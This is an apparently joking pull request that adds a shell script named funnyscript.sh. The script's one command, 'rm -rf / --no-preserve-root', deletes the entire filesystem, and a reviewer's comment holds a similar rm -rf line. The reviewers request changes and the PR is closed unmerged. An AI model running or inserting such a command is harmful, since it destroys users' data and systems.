### PR TITLE
lul

### PR DESCRIPTION
**Pull request by subby2006**

### CODE REVIEW

**Comment by Narwaffle22** [comment]
no

**Comment by snailmusic** [comment]
sudo rm -rf /deez/nuts

File: funnyscript.sh [hunk 1]
```diff
@@ -0,0 +1,2 @@
+#! /bin/sh
+rm -rf / --no-preserve-root
```
Comment (snailmusic) [inline funnyscript.sh:2]: not everyone uses bash as you know

**Review by snailmusic — CHANGES_REQUESTED** [review]
make better code

File: funnyscript.sh (hunk 1 above)
Comment (subby2006) [reply funnyscript.sh:2]: no you bash is the superior shell

**Comment by subby2006** [comment]
> no

yes

**Pull request closed without merging**